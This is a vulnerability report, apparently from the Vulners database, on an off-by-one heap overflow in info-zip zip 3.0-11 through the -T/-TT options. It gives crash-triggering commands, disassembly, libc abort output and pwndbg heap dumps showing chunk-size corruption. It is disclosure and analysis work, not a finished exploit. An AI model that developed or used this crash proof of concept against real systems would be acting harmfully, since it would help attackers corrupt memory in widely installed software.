Vulners
Lucene search
Info-Zip Zip 3.0-11 Crash
`Hello,
I found info-zip's zip command's crash.
This vulnerability is occured by off by one.
I don't use the malformed file for crash. just command.
And if 'zip' binary is added to function, it can be exploitable vulnerability I think.
[ Environment ]
OS : Ubuntu 16.04.3 LTS
Kernel : Linux ubuntu 4.4.0-127-generic #153-Ubuntu SMP Sat May 19 10:58:46 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
info-zip zip : 3.0-11
[ Condition ]
* using option -T, -TT
* Vulnerability is occured by off by one.
: linux command execution using option -T, -TT
: To execute the command used in the -T and -TT options, it is stored in the heap before the system, and the data to be stored is parsed as follows.
: 0x18 => zip flagT.zip -T -TT 'AAAAAAAAAAAA' => AAAAAAAAAAAA 'flagT.zip'
: 0x38 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: 0x58 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: When an instruction is stored in the heap, it is occured by off by one.
: It happens in the code below.
Disassembly -
.text:000000000040A052 mov rax, [rsp+48h+var_40]
.text:000000000040A057 mov word ptr [r15+rax+2], 27h
Hexray -
*(_WORD *)&v7[v16 + 2] = 0x27;
[ Error Msg ]
CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAA' <- die process
sh: 1: AAAAAAAAAAAA: not found
*** Error in `zip': free(): invalid next size (fast): 0x00000000009ef350 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]
======= Memory map: ========
00400000-0042c000 r-xp 00000000 08:01 2229966 /usr/bin/zip
0062c000-0062d000 r--p 0002c000 08:01 2229966 /usr/bin/zip
0062d000-0062f000 rw-p 0002d000 08:01 2229966 /usr/bin/zip
0062f000-0067e000 rw-p 00000000 00:00 0
009ee000-00a0f000 rw-p 00000000 00:00 0 [heap]
7f4728000000-7f4728021000 rw-p 00000000 00:00 0
7f4728021000-7f472c000000 ---p 00000000 00:00 0
7f472fabe000-7f472fad4000 r-xp 00000000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fad4000-7f472fcd3000 ---p 00016000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd3000-7f472fcd4000 rw-p 00015000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd4000-7f472ffac000 r--p 00000000 08:01 2229713 /usr/lib/locale/locale-archive
7f472ffac000-7f473016c000 r-xp 00000000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f473016c000-7f473036c000 ---p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f473036c000-7f4730370000 r--p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f4730370000-7f4730372000 rw-p 001c4000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f4730372000-7f4730376000 rw-p 00000000 00:00 0
7f4730376000-7f4730385000 r-xp 00000000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730385000-7f4730584000 ---p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730584000-7f4730585000 r--p 0000e000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730585000-7f4730586000 rw-p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730586000-7f47305ac000 r-xp 00000000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7f4730786000-7f473078a000 rw-p 00000000 00:00 0
7f47307aa000-7f47307ab000 rw-p 00000000 00:00 0
7f47307ab000-7f47307ac000 r--p 00025000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ac000-7f47307ad000 rw-p 00026000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ad000-7f47307ae000 rw-p 00000000 00:00 0
7ffc94323000-7ffc94344000 rw-p 00000000 00:00 0 [stack]
7ffc9439b000-7ffc9439e000 r--p 00000000 00:00 0 [vvar]
7ffc9439e000-7ffc943a0000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
zip error: Interrupted (aborting)
*** Error in `zip': free(): invalid pointer: 0x00000000009ef370 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x40873e]
zip[0x4090cb]
zip[0x409279]
/lib/x86_64-linux-gnu/libc.so.6(+0x354b0)[0x7f472ffe14b0]
/lib/x86_64-linux-gnu/libc.so.6(gsignal+0x38)[0x7f472ffe1428]
/lib/x86_64-linux-gnu/libc.so.6(abort+0x16a)[0x7f472ffe302a]
/lib/x86_64-linux-gnu/libc.so.6(+0x777ea)[0x7f47300237ea]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]
======= Memory map: ========
00400000-0042c000 r-xp 00000000 08:01 2229966 /usr/bin/zip
0062c000-0062d000 r--p 0002c000 08:01 2229966 /usr/bin/zip
0062d000-0062f000 rw-p 0002d000 08:01 2229966 /usr/bin/zip
0062f000-0067e000 rw-p 00000000 00:00 0
009ee000-00a0f000 rw-p 00000000 00:00 0 [heap]
7f4728000000-7f4728021000 rw-p 00000000 00:00 0
7f4728021000-7f472c000000 ---p 00000000 00:00 0
7f472fabe000-7f472fad4000 r-xp 00000000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fad4000-7f472fcd3000 ---p 00016000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd3000-7f472fcd4000 rw-p 00015000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd4000-7f472ffac000 r--p 00000000 08:01 2229713 /usr/lib/locale/locale-archive
7f472ffac000-7f473016c000 r-xp 00000000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f473016c000-7f473036c000 ---p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f473036c000-7f4730370000 r--p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f4730370000-7f4730372000 rw-p 001c4000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7f4730372000-7f4730376000 rw-p 00000000 00:00 0
7f4730376000-7f4730385000 r-xp 00000000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730385000-7f4730584000 ---p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730584000-7f4730585000 r--p 0000e000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730585000-7f4730586000 rw-p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730586000-7f47305ac000 r-xp 00000000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7f4730786000-7f473078a000 rw-p 00000000 00:00 0
7f47307a9000-7f47307aa000 rw-p 00000000 00:00 0
7f47307ab000-7f47307ac000 r--p 00025000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ac000-7f47307ad000 rw-p 00026000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ad000-7f47307ae000 rw-p 00000000 00:00 0
7ffc94323000-7ffc94344000 rw-p 00000000 00:00 0 [stack]
7ffc9439b000-7ffc9439e000 r--p 00000000 00:00 0 [vvar]
7ffc9439e000-7ffc943a0000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' <- not die process
sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAA: not found
*** Error in `zip': corrupted size vs. prev_size: 0x0000000001702190 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fa2c7f497e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x7e913)[0x7fa2c7f50913]
/lib/x86_64-linux-gnu/libc.so.6(+0x81cde)[0x7fa2c7f53cde]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fa2c7f56184]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_doallocate+0x55)[0x7fa2c7f3f1d5]
/lib/x86_64-linux-gnu/libc.so.6(_IO_doallocbuf+0x34)[0x7fa2c7f4d594]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_overflow+0x1c8)[0x7fa2c7f4c8f8]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_xsputn+0xad)[0x7fa2c7f4b28d]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0xd1)[0x7fa2c7f1f241]
/lib/x86_64-linux-gnu/libc.so.6(__fprintf_chk+0xf9)[0x7fa2c7fe8bc9]
zip[0x40a0a4]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fa2c7ef2830]
zip[0x408529]
======= Memory map: ========
00400000-0042c000 r-xp 00000000 08:01 2229966 /usr/bin/zip
0062c000-0062d000 r--p 0002c000 08:01 2229966 /usr/bin/zip
0062d000-0062f000 rw-p 0002d000 08:01 2229966 /usr/bin/zip
0062f000-0067e000 rw-p 00000000 00:00 0
01701000-01722000 rw-p 00000000 00:00 0 [heap]
7fa2c0000000-7fa2c0021000 rw-p 00000000 00:00 0
7fa2c0021000-7fa2c4000000 ---p 00000000 00:00 0
7fa2c79e4000-7fa2c79fa000 r-xp 00000000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fa2c79fa000-7fa2c7bf9000 ---p 00016000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fa2c7bf9000-7fa2c7bfa000 rw-p 00015000 08:01 3937284 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fa2c7bfa000-7fa2c7ed2000 r--p 00000000 08:01 2229713 /usr/lib/locale/locale-archive
7fa2c7ed2000-7fa2c8092000 r-xp 00000000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8092000-7fa2c8292000 ---p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8292000-7fa2c8296000 r--p 001c0000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8296000-7fa2c8298000 rw-p 001c4000 08:01 3952945 /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8298000-7fa2c829c000 rw-p 00000000 00:00 0
7fa2c829c000-7fa2c82ab000 r-xp 00000000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c82ab000-7fa2c84aa000 ---p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c84aa000-7fa2c84ab000 r--p 0000e000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c84ab000-7fa2c84ac000 rw-p 0000f000 08:01 3937245 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c84ac000-7fa2c84d2000 r-xp 00000000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7fa2c86ac000-7fa2c86b0000 rw-p 00000000 00:00 0
7fa2c86d0000-7fa2c86d1000 rw-p 00000000 00:00 0
7fa2c86d1000-7fa2c86d2000 r--p 00025000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7fa2c86d2000-7fa2c86d3000 rw-p 00026000 08:01 3952943 /lib/x86_64-linux-gnu/ld-2.23.so
7fa2c86d3000-7fa2c86d4000 rw-p 00000000 00:00 0
7ffc0dc06000-7ffc0dc27000 rw-p 00000000 00:00 0 [stack]
7ffc0dd37000-7ffc0dd3a000 r-np 00000000 00:00 0 [vvar]
7ffc0dd3a000-7ffc0dd3c000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
zip error: Interrupted (aborting)
[ Debugging ]
set follow-fork-mode parent
b*0x0000000000409F13
b*0x0000000000409E11
r flagT.zip -T -TT 'AAAAAAAAAAAA'
* Case 1 : zip flagT.zip -T -TT 'AAAAAAAAAAAA'
: this case malloc 0x18 size.
: so, overwrite next chunk size to null. (off by one)
# Not Crash
pwndbg> x/32gx 0x67f340
0x67f340: 0x0000000000000230 0x0000000000000020
0x67f350: 0x4141414141414141 0x616c662720414141
0x67f360: 0x002770697a2e5467 0x00000000000000c1 <- off by one
0x67f370: 0x00000000000a031e 0x000000004ce40567
0x67f380: 0x0000000040a61838 0x0000000000000003
0x67f390: 0x0000000000000003 0x0000001800000004
0x67f3a0: 0x0000000000000000 0x0000000000000001
0x67f3b0: 0x0000000000000000 0x0000000081b40000
0x67f3c0: 0x000000000067f490 0x0000000000000000
0x67f3d0: 0x000000000067f450 0x0000000000000000
0x67f3e0: 0x000000000067f430 0x000000000067f470
0x67f3f0: 0x000000000067f4d0 0x0000000000000000
0x67f400: 0x0000000000000000 0x0000000000000000
0x67f410: 0x0000000000000000 0x0000000000000000
0x67f420: 0x0000000000000000 0x0000000000000021
0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78
# Crash
0x67f340: 0x0000000000000230 0x0000000000000020
0x67f350: 0x4141414141414141 0x6c66272041414141
0x67f360: 0x2770697a2e546761 0x0000000000000000 <- off by one
0x67f370: 0x00000000000a031e 0x000000004ce40567
0x67f380: 0x0000000040a61838 0x0000000000000003
0x67f390: 0x0000000000000003 0x0000001800000004
0x67f3a0: 0x0000000000000000 0x0000000000000001
0x67f3b0: 0x0000000000000000 0x0000000081b40000
0x67f3c0: 0x000000000067f490 0x0000000000000000
0x67f3d0: 0x000000000067f450 0x0000000000000000
0x67f3e0: 0x000000000067f430 0x000000000067f470
0x67f3f0: 0x000000000067f4d0 0x0000000000000000
0x67f400: 0x0000000000000000 0x0000000000000000
0x67f410: 0x0000000000000000 0x0000000000000000
0x67f420: 0x0000000000000000 0x0000000000000021
0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78
* Case 2 : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
# crash
: before __fprintf_chk@plt <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000041
0x67f160: 0x000000000067f0b0 0x4141414141414141
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x6c66272041414141
0x67f190: 0x2770697a2e546761 0x0000000000000100 <- off by one
^
prev_size
# not crash
: before __fprintf_chk@plt <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000041
0x67f160: 0x000000000067f0b0 0x4141414141414141
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x616c662720414141
0x67f190: 0x002770697a2e5467 0x00000000000001f1
: after __fprintf_chk@plt <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000251
0x67f160: 0x00007ffff7bc1db8 0x00007ffff7bc1db8
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x616c662720414141
0x67f190: 0x002770697a2e5467 0x0000000000000211
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jul 2018 00:00Current